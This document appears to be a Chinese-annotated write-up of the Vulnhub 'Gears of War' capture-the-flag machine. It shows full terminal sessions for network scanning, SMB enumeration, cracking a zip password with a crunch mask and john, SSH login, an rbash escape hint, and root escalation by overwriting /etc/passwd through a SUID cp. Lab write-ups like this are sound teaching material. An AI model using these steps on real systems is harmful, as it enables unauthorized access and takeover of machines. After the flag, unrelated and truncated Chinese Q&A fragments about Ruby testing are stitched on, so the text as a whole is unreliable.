─(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:05 1 60 Unknown vendor
192.168.56.100 08:00:27:a1:99:30 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:25:35:76 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254
┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 22:11 EDT
Nmap scan report for localhost (192.168.56.254)
Host is up (0.000094s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 09038d1ff8c9d4b443b3c37312ba95e1 (RSA)
| 256 1ba05f3ea26b225a81c3187e5bfcd2bd (ECDSA)
|_ 256 181f0cd6e72af55c45cb8d7970314b7a (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: LOCUST)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: LOCUST)
MAC Address: 08:00:27:25:35:76 (Oracle VirtualBox virtual NIC)
Service Info: Host: GEARS_OF_WAR; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
| smb2-time:
| date: 2023-05-01T02:11:52
|_ start_date: N/A
|_nbstat: NetBIOS name: GEARS_OF_WAR, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: gears_of_war
| NetBIOS computer name: GEARS_OF_WAR\x00
| Domain name: \x00
| FQDN: gears_of_war
|_ System time: 2023-05-01T02:11:52+00:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.95 seconds
┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ smbclient -L 192.168.56.254
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
LOCUS_LAN$ Disk LOCUST FATHER
IPC$ IPC IPC Service (gears_of_war server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
LOCUST GEARS_OF_WAR
┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ smbclient //192.168.56.254/LOCUS_LAN$
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Oct 17 14:06:58 2019
.. D 0 Thu Oct 17 09:51:38 2019
msg_horda.zip N 332 Thu Oct 17 10:53:33 2019
SOS.txt N 198 Thu Oct 17 14:06:58 2019
5190756 blocks of size 1024. 2014200 blocks available
smb: \> get SOS.txt
getting file \SOS.txt of size 198 as SOS.txt (96.7 KiloBytes/sec) (average 96.7 KiloBytes/sec)
smb: \> get msg_horda.zip
getting file \msg_horda.zip of size 332 as msg_horda.zip (162.1 KiloBytes/sec) (average 129.4 KiloBytes/sec)
smb: \> pwd
Current directory is \\192.168.56.254\LOCUS_LAN$\
smb: \> put test.txt
NT_STATUS_ACCESS_DENIED opening remote file \test.txt
smb: \> quit
smb服务不允许上传文件
将共享目录的文件下载到Kali Linux到本地
─(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ enum4linux 192.168.56.254
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\marcus (Local User)
利用enum4linux工具识别目标主机存在marcus用户
┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ cat SOS.txt
This is a message for the Delta Team.
I found a file that contains a password to free ........ oh no they here!!!!!!!!!!,
i must protect myself, please try to get the password!!
[@%%,]
-Hoffman.
┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ unzip msg_horda.zip
Archive: msg_horda.zip
[msg_horda.zip] key.txt password:
┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ zip2john msg_horda.zip > hash
ver 2.0 efh 5455 efh 7875 msg_horda.zip/key.txt PKZIP Encr: TS_chk, cmplen=152, decmplen=216, crc=37552E74 ts=7635 cs=7635 type=8
┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2023-04-30 22:15) 0g/s 9313Kp/s 9313Kc/s 9313KC/s !LUVDKR!..*7¡Vamos!
Session completed.
┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash --force
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2023-04-30 22:16) 0g/s 13280Kp/s 13280Kc/s 13280KC/s !LUVDKR!..*7¡Vamos!
Session completed.
john没有破解出来。
SOS.txt文件中的[@%%,],是密码的表达式吗?可用crunch产生字典
┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ crunch 4 4 -t @%%, > dict
Crunch will now generate the following amount of data: 338000 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 67600
┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ wc -l dict
67600 dict
这样就根据作者提示的表达式创建了字典,然后用该字典去破解压缩文件的密码。
──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ john --wordlist=dict hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
r44M (msg_horda.zip/key.txt)
1g 0:00:00:00 DONE (2023-04-30 22:40) 16.66g/s 819200p/s 819200c/s 819200C/s r32Y..s90L
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
很快就破解得到了密码。
┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ unzip msg_horda.zip
Archive: msg_horda.zip
[msg_horda.zip] key.txt password:
inflating: key.txt
┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ cat key.txt
"Vamos a atacar a los humanos con toda nuestras hordas,
por eso puse en prision a el hombre mas peligroso que tenian,
por lo que sin el son debiles."
[[[[[[[[[[[[[[[[[[[[["3_d4y"]]]]]]]]]]]]]]]]]]]]
-General RAAM.
3_d4y应该是某个用户的密码,而前面enum4linxu工具已经扫描出用户名为marcus
┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ ssh marcus@192.168.56.254
The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
ED25519 key fingerprint is SHA256:63GFdRgqF2ztaC4ps1OyfL9ZA7GOoIvatMoxc/cIb78.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
marcus@192.168.56.254's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon May 1 02:43:25 UTC 2023
System load: 0.0 Processes: 94
Usage of /: 58.3% of 4.95GB Users logged in: 0
Memory usage: 39% IP address for enp0s3: 192.168.56.254
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
48 packages can be updated.
0 updates are security updates.
Last login: Thu Oct 17 18:38:43 2019
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
marcus@gears_of_war:~$ id
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
marcus@gears_of_war:~$ sudo -l
[sudo] password for marcus:
Sorry, user marcus may not run sudo on gears_of_war.
marcus@gears_of_war:~$ ls -alh
total 40K
drwxrwxrwx 6 marcus marcus 4.0K Oct 17 2019 .
drwxr-xr-x 4 root root 4.0K Oct 17 2019 ..
-rw------- 1 marcus marcus 17 Oct 17 2019 .bash_history
-rwxrwxrwx 1 marcus marcus 220 Apr 4 2018 .bash_logout
-rwxrwxrwx 1 marcus marcus 3.7K Apr 4 2018 .bashrc
drwxrwxrwx 2 marcus marcus 4.0K Oct 16 2019 .cache
drwxrwxrwx 3 marcus marcus 4.0K Oct 16 2019 .gnupg
drwxrwxrwx 2 marcus marcus 4.0K Oct 17 2019 jail
drwxrwxrwx 3 marcus marcus 4.0K Oct 16 2019 .local
-rwxrwxrwx 1 marcus marcus 670 Oct 17 2019 .profile
marcus@gears_of_war:~$ cat .bash_his-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a2': invalid number specifier
-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a0': invalid number specifier
cat: .bash_his: No such file or directory
marcus@gears_of_war:~$ cat .bash_history
history
su root
marcus@gears_of_war:~$ cd jail
-rbash: cd: restricted
marcus@gears_of_war:~$ which nc
/bin/nc
这应该是受限的shell
用-t ‘bash -noprofile'可绕过限制
cp命令有SUID位
利用cp命令的SUID位进行提权,可以创建密码,然后写入/etc/passwd文件中去
┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ openssl passwd -6 -salt jason 123456
$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41
jason:$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41:0:0:root:/root:/bin/bash
内容添加到passwd(可以在/tmp目录下完成),然后利用cp命令覆盖原来的/etc/passwd文件
marcus@gears_of_war:/tmp$ cp passwd /etc/passwd
marcus@gears_of_war:/tmp$ su - jason
Password:
root@gears_of_war:~# cd /root
root@gears_of_war:~# ls -alh
total 52K
drwx------ 6 root root 4.0K Oct 17 2019 .
drwxr-xr-x 24 root root 4.0K Oct 16 2019 ..
-rw------- 1 root root 216 Oct 17 2019 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwx------ 2 root root 4.0K Oct 17 2019 .cache
-rw-r--r-- 1 root root 13K Oct 17 2019 .flag.txt
drwx------ 3 root root 4.0K Oct 17 2019 .gnupg
drwxr-xr-x 3 root root 4.0K Oct 16 2019 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4.0K Oct 16 2019 .ssh
root@gears_of_war:~# cat .flag.txt
.,*,,
.*(((#((((*,.
,*/,,,..*/(((/*/#(.
.*//*((####(/,,*,/(#(*
..,*//((*, ....**/**(##########%#(*,*(#/.
.*/((#######((*. ..,*..*,,**///*,,,/(################(//*,.
.,/(((((((((((####/.. ...,,*,****,,*/#####################*/(,.
.,/(((/((#(##########(,.,,,,//((/*/(####(##################(///.
,*(##(#((((/#######%#(###(##################################/((*
.*((#/*/(/(#############(#######################(#((#(######*((*
.*((((#####################################(########((######**/*.
,/##((###########################################(##########*,(///.
*(((###%#####################################################(,****,
.,/(##(#######%%#####%############(#(############################(***,.
.**(##%##%###(#####((###############%######//,,*/((###################(,...
./(##((##%#(##(/(((((##########################/*. *(############%####(,. .
**(####((###((///####%######################%####(*, ,((###############*
.,//*/((((#((/*,,*##################################((/ ./(#%#####%###%###/*****,.
..*//(/*/#(((/(//*/#####################################(/. ./#####%#%#################*.
.,,,*//.**((#(/####(#((((,,(#######################################(* ./(######################(/
,,,/(**((((*///(#(#####(/,../################(#(###(##################( ,((%##############((((#((.
.,*///(####(//(((######((. ,/##################################%######( .*(####%########(##(####*
.**/((((##(((*//(/((###((*. ./((####################(###################( .*(#########(#####(####(
.,***/(///(((/##(/((####(* .,*(###########################(##############*. .*(###%#######/(((##(##,
,*//*/((//(####(((((#/((,. .*##((####################(############(####/(/,, ./(#######((((#((####(*
,/(((((((#(((((//##(((/. ,*#%#####%#########################/,. .*##/*((** ,/################(*
.*(/((//((/((((((/((//, */##############################/. *#((//#(,. ,(##############/
,/((##(((((##(*///*, .*(#%########(########%########(* ,(#(//##* *(##%########(.
./((/###(#(((((((// ./#####%##%###(((#((############/ ./###((((* ,(###%######(*
.*###(##(/(#(#((/, ,/###########( .(####(###*. .,/######(*/* ./###########/
,/(##(#######/(, ,/(###(/##(/. /##########(##(############((. ./#########%#(
/(###((#####/, ,*((((####, ./#####/,((#################(/, ./###########/
/#########((/, */##(/(#/. *###, (( .##############(/(/. ./##%#######(/
(###########(, .(((#(*//* .,(((### (. *(#(######(#(*..*/, ,(#(##%####((/
./(####(#####/. ,((##/,(#############* (, ,(##(#####(*. ....,. *(##%##(##((/,
.*(((##(####%#/ .*((###/(#############(, .(#######(/((##. . ,. ,, .(#######(//*//.
.*/((#(#######(, ,/#((/((##(##(################(#(##((##(/(. . *##(######/(/(#/*
,/((//((#######(*, ,*/(//((#############(########(#*,*...,*/ * ,#######(#/(###(**/,
,(####/(#######(((/, ,*//*/##((#((#(#######,((.,#, *,*.,..,*..(. .##########(((/////**,.
.,*(**(#####%#######(*. ..,*(((**..((((####,,,,#*/*..,,. ,/*/,**/, ./#%####((##/////////***,
..//(/*(################(,, .**,,/. ./(##/*(.* ...*(.,*,* *((##(/. ./###%#((((##(/(((**/***,.
,**((/((#################//*. ,/**#* ,((((/*/ , .,.*(.**/((###### *(##((#(######(//*//((/*,.
*(#(*/(/####(##############((/, ,(##. *(#*,*.(*#* .((//##%##((( ,*(###((((###(######/*,*,.
..,*((/#(((##(################((**. ,####//((###(##/((((#######((/. .*/(###(((((########*/,**,..
...,/#(#//########%#%###########(/**,. *####################%%#(#(*. ,((##((((#/(((#%%#((///*,,.
..*(##((######%#%###############(//**, .##################%###/. .,/(#######(##((//(//**,.
.,*/(########%#####################((/*,. *####%#%%%########(/* .*/((######%%#(////*
.,***//((((#####%###################((/**.. ,/######((*. ,*(####%########(((**.
.,**,****/**/**//***####################(/**,*,,... .,**/*.. ..,,,*/((#####%##########(/.
..,,********,,((####################(#(///******/*///(((###########%#####%###(/.
. ,*******/(###################((#################################(###/,
.,,,/**/##################(#######(#########################((####,
.*/*/#######################################################(#(.
.//############((((########(#######################((####((/*.
. ,(##########(((((((###########################((###(((((((*,
. .((############((((###(*,,*//*///*//(##%############((//**/*,
.*(######(#(#######(**, .*(#######((((/(//**,,
. ,*/#####((((((##/, .*. ./###((((////,.
.,.,,//#########*.. . ,, /((/(/*,
. . . ,../(#####(*/ . . ..
* .. .,/(#*. . .
.,../#, . . .
. . .#/ . .
.. .#/ .
#/
. .(/
. /#
. ,(. . .
.. ,(( .
Congratulation you got out of the jail and finish this Episode#1!
Please share and support me on twitter!
Twitter: @sir809
root@gears_of_war:~#
很好奇,就使用rubyonrails自动化单元测试而言,你们正在做什么?您是否创建了一个脚本来在cron中运行rake作业并将结果邮寄给您?git中的预提交Hook?只是手动调用?我完全理解测试,但想知道在错误发生之前捕获错误的最佳实践是什么。让我们理所当然地认为测试本身是完美无缺的,并且可以正常工作。下一步是什么以确保他们在正确的时间将可能有害的结果传达给您? 最佳答案 不确定您到底想听什么,但是有几个级别的自动代码库控制:在处理某项功能时,您可以使用类似autotest的内容获得关于哪些有效,哪些无效的即时反馈。要确保您的提
我正在编写一个包含C扩展的gem。通常当我写一个gem时,我会遵循TDD的过程,我会写一个失败的规范,然后处理代码直到它通过,等等......在“ext/mygem/mygem.c”中我的C扩展和在gemspec的“扩展”中配置的有效extconf.rb,如何运行我的规范并仍然加载我的C扩展?当我更改C代码时,我需要采取哪些步骤来重新编译代码?这可能是个愚蠢的问题,但是从我的gem的开发源代码树中输入“bundleinstall”不会构建任何native扩展。当我手动运行rubyext/mygem/extconf.rb时,我确实得到了一个Makefile(在整个项目的根目录中),然后当
我有一个围绕一些对象的包装类,我想将这些对象用作散列中的键。包装对象和解包装对象应映射到相同的键。一个简单的例子是这样的:classAattr_reader:xdefinitialize(inner)@inner=innerenddefx;@inner.x;enddef==(other)@inner.x==other.xendenda=A.new(o)#oisjustanyobjectthatallowso.xb=A.new(o)h={a=>5}ph[a]#5ph[b]#nil,shouldbe5ph[o]#nil,shouldbe5我试过==、===、eq?并散列所有无济于事。
我有一些Ruby代码,如下所示:Something.createdo|x|x.foo=barend我想编写一个测试,它使用double代替block参数x,这样我就可以调用:x_double.should_receive(:foo).with("whatever").这可能吗? 最佳答案 specify'something'dox=doublex.should_receive(:foo=).with("whatever")Something.should_receive(:create).and_yield(x)#callthere
Sinatra新手;我正在运行一些rspec测试,但在日志中收到了一堆不需要的噪音。如何消除日志中过多的噪音?我仔细检查了环境是否设置为:test,这意味着记录器级别应设置为WARN而不是DEBUG。spec_helper:require"./app"require"sinatra"require"rspec"require"rack/test"require"database_cleaner"require"factory_girl"set:environment,:testFactoryGirl.definition_file_paths=%w{./factories./test/
我遵循MichaelHartl的“RubyonRails教程:学习Web开发”,并创建了检查用户名和电子邮件长度有效性的测试(名称最多50个字符,电子邮件最多255个字符)。test/helpers/application_helper_test.rb的内容是:require'test_helper'classApplicationHelperTest在运行bundleexecraketest时,所有测试都通过了,但我看到以下消息在最后被标记为错误:ERROR["test_full_title_helper",ApplicationHelperTest,1.820016791]test
我已经构建了一些serverspec代码来在多个主机上运行一组测试。问题是当任何测试失败时,测试会在当前主机停止。即使测试失败,我也希望它继续在所有主机上运行。Rakefile:namespace:specdotask:all=>hosts.map{|h|'spec:'+h.split('.')[0]}hosts.eachdo|host|begindesc"Runserverspecto#{host}"RSpec::Core::RakeTask.new(host)do|t|ENV['TARGET_HOST']=hostt.pattern="spec/cfengine3/*_spec.r
我在app/helpers/sessions_helper.rb中有一个帮助程序文件,其中包含一个方法my_preference,它返回当前登录用户的首选项。我想在集成测试中访问该方法。例如,这样我就可以在测试中使用getuser_path(my_preference)。在其他帖子中,我读到这可以通过在测试文件中包含requiresessions_helper来实现,但我仍然收到错误NameError:undefinedlocalvariableormethod'my_preference'.我做错了什么?require'test_helper'require'sessions_hel
只是想确保我理解了事情。据我目前收集到的信息,Cucumber只是一个“包装器”,或者是一种通过将事物分类为功能和步骤来组织测试的好方法,其中实际的单元测试处于步骤阶段。它允许您根据事物的工作方式组织您的测试。对吗? 最佳答案 有点。它是一种组织测试的方式,但不仅如此。它的行为就像最初的Rails集成测试一样,但更易于使用。这里最大的好处是您的session在整个Scenario中保持透明。关于Cucumber的另一件事是您(应该)从使用您的代码的浏览器或客户端的角度进行测试。如果您愿意,您可以使用步骤来构建对象和设置状态,但通常您
我有:When/^(?:|I)follow"([^"]*)"(?:within"([^"]*)")?$/do|link,selector|with_scope(selector)doclick_link(link)endend我打电话的地方:Background:GivenIamanexistingadminuserWhenIfollow"CLIENTS"我的HTML是这样的:CLIENTS我一直收到这个错误:.F-.F--U-----U(::)failedsteps(::)nolinkwithtitle,idortext'CLIENTS'found(Capybara::Element